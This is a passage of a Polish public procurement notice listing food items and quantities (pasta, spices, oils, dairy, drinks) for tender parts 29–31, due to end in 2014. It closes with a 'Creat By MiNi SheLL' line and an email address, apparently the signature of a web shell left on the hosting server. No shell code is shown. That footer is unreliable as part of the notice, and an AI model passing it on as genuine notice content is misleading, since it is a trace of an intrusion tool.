makaron nitki  0.5 kg	szt	8
makaron gniazda 1kg	szt	8
makar. gniaz. 0,4kg	szt	8
makaron kokardy	kg	1
makaron łazanki 400-500g	szt	5
makaron rurki 1 kg	szt	5
makaron paczka   400-500g	szt	5
makaron świderki 1kg	szt	5
makaron spagetti 0,5kg	szt	15
makaron zacierka 250	szt	10
majeranek 20g	szt	10
majeranek 150g	szt	3
majeranek 500g	szt	1
majonez sałatkowy 350g	szt	6
majonez  sałatkowy 700g	szt	14
majonez sałatkowy 900g	szt	3
miód sztuczny kg	kg	2
Miód naturalny 	kg	1
Miód naturalny słoik 200-250g	szt	3
musztarda 165-190g	szt	10
Ocet 10% 1 l	szt	16
paluszki z sezamem 70g	szt	30
paluszki z sezamem 70g	szt	30
papryka mielona 20g	szt	15
papryka miel pikantna 20g	szt	15
pieprz mielony 20g	szt	10
pieprz w ziarnkach 20g	szt	5
pieprz ziolowy 20g	szt	5
polewa do lodów 200/250g	szt	8
proszek do pieczenia 25-30g	szt	20
przyprawa gyros 20	szt	10
przyprawa do bigosu 0,3	szt	10
przyprawa do grilla 20g	szt	10
przyprawa do kurczaka 25-30g	szt	10
przyprwa do ryb 20g	szt	10
puure ziemn. z boczkiem 35 g	szt	30
rosół drobiowy słoik 125-190g	szt	10
rosól drobiowy 1 kg	szt	6
rosół drobiowy kost. 60-120g	szt	7
soda spożywcza 80g	szt	3
sos słodko -kwaśny/do spagetti0,9 l	szt	6
sos chili 200-250g	szt	1
sos czosnkowy 220-250g	szt	4
sos do deserów 1 l	szt	5
sos mix koper-zioł, włoski itp 9g	szt	48
sos sojowy 600-1000g	szt	2
sos sojowo-grzybowy 600-1000g	szt	1
sól	kg	12
sól konserwowa 	kg	5
wafelek duży(wafel z kremem typu murzynek) 55-60g	szt	30
wafelek mały(wafel z kremem typu murzynek) 35-55g	szt	30
wafelek w polewie 50g	szt	144
wafelek b/polewy typu grzesiek  lub równoważny	szt	144
wiórki kokosowe 0,25	szt	3
ziele angielskie 60g	szt	5
zupki typu chińska(ostra,łagodna rosołowa itp.) 70g	szt	30
zupki typu chiska(rosołowa-ostra/lagodna,krabowa itp.) 70g	szt	30
zupki typu chińska(pomidorowa, barszcz,itp) 70g	szt	30
zelatyna 50g	szt	10
żurek w butelce 350-500ml	szt	5
zurek w proszku 60-90g	szt	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 29 <b>NAZWA:</b> Zadanie nr 29- oleje i tłuszcze roślinne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> margaryna z masłem 0,5 kg	szt	45
margaryna  0,5 kg 	szt	5
masło roślinne 200g	szt	5
oliwa z oliwek 1 l	szt	4
olej 1l	szt	50
olej 3l	szt	3
olej 5l	szt	2
smalec	kg	1
smalec 200g	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 30 <b>NAZWA:</b> Zadanie nr 30 - produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> deser mleczno owocowy 125-150g	szt	30
deser  6x55g	opk	30
jogurt pitny 100/150	szt	30
jogurt ze zbożami/musli 150	szt	40
jogurt 150g	szt	60
jogurt 110/150	szt	90
jogurt typu serduszko  lub równoważny 110-150g	szt	60
Lody-rolada 1l	szt	12
1lody 1,5 l	szt	4
Kefir 0,2-0,4l	szt	20
Masło . 200G	szt	50
maślanka owocowa 0,3-0,45l	l	10
Mleko  UHT 2% 1l	szt	12
Mleko UHT 3,2% 1l	szt	160
ser feta 180-250 g	szt	13
serek grani 0,18-0,2	szt	50
serek homogenizowany 125-150g	szt	50
serek kanapk. Twarożk. 120-220g	szt	25
serek twaroż.150g	szt	50
ser twarogowy 200-250g	szt	20
set topiony kostka q100g	szt	40
ser topiony -kielbaski 100	szt	40
ser top. Krążek 200	szt	50
ser topiony zegar 140-160g	kg	50
ser salami	kg	4
ser wędzony	kg	4
ser żółty typu edamski	kg	3
ser żółty typu królewski	kg	3
ser żółty typu morski	kg	3
ser żółty typu szwajcar	kg	12
śmietanka jednoraz. 10Szt	szt	150
śmietana w spray 0,5	szt	4
Śmietanka 18% 0,2-0,5 l	szt	16
Śmietanka 18% 1l	szt	4
Śmietanka 30% 0,2- 0,5 l	szt	10
Smietanka 30% 1l	szt	15
Śmietana 30% 1 l	szt	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 31 <b>NAZWA:</b> Zadanie nr 31 - napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> napoje gazowane 1,5 l	szt	30
napoje niegazowane 1,5 l	szt	60
napój gazowany 2l	szt	20
napój n/g 2 l	szt	20
napój owocowy 0,2-03 l	szt	60
napój 0,2 - 03 l	szt	40
mnapój energet. typu tiger  lub równoważny 0,2 - 03l	szt	40
Woda mineral. 0,5 gaz	szt	134
Woda mineralna 0,5 n/g	szt	120
woda mineral. n/g 1,5 l typu	szt	60
Woda mineralna g 1,5 l typu	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.90.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com